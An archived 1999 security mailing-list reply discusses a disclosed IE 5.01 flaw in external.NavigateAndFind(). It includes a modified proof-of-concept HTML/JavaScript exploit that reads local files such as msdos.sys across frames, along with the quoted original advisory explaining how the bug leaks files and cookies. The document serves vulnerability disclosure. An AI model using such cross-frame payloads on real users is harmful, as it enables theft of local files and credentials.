Re: IE 5.01 vulnerabilities in external.NavigateAndFind()

From: Scott Morris (limbo_14at_private)
Date: Thu Dec 23 1999 - 08:20:07 PST

Next message: Keith Owens: "Re: Announcement: Solaris loadable kernel module backdoor"

Previous message: Randy Mclean: "Re: Groupewise Web Interface"
Maybe in reply to: Georgi Guninski: "IE 5.01 vulnerabilities in external.NavigateAndFind()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I altered the script to the following, and under Netscape 4.06, it caused
Win95B to reboot immediately.  I also tried it under IE4.0, and it loaded
the msdos.sys file to the text window, as expected.

<html>
<IFRAME NAME="I1" SRC="file://c:/msdos.sys"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>

IE 5.01 vulnerabilities in external.NavigateAndFind()

<--snipped
Internet Explorer 5.01 under Windows 95 and 5.0 under WinNT 4.0 (suppose
other versions are also vulnerable)
allows circumventing "Cross frame security policy" by using
external.NavigateAndFind().
This exposes the whole DOM of the target document.
This allows reading local text and HTML files and files from any host
(suppose reading files of any type is possible), getting cookies (that
is dangerous because may get passwords, etc.) and other sensitive
information.
It is also possible in some cases to read files behind firewall.
This vulnerability may be exploited using HTML email message or a
newsgroup posting.

Details:

window.external.NavigateAndFind() is used to search for strings in
specified URLs displaying the result in a specified frame.
The problem is it allows searching in "javascript:" URLs in a specified
frame.
In this case the code in the "javascript:" URL is executed in the
security context of the target frame
and the code has access to the document loaded in the target frame.
Examine the code below for more information.

The code is:
----------------------------------------------------------------------------------------
<IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>
----------------------------------------------------------------------------------------



___________________________________________________________________
To get your own FREE ZDNet onebox - FREE voicemail, email, and fax,
all in one place - sign up today at http://www.zdnetonebox.com

Next message: Keith Owens: "Re: Announcement: Solaris loadable kernel module backdoor"
Previous message: Randy Mclean: "Re: Groupewise Web Interface"
Maybe in reply to: Georgi Guninski: "IE 5.01 vulnerabilities in external.NavigateAndFind()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:06 PDT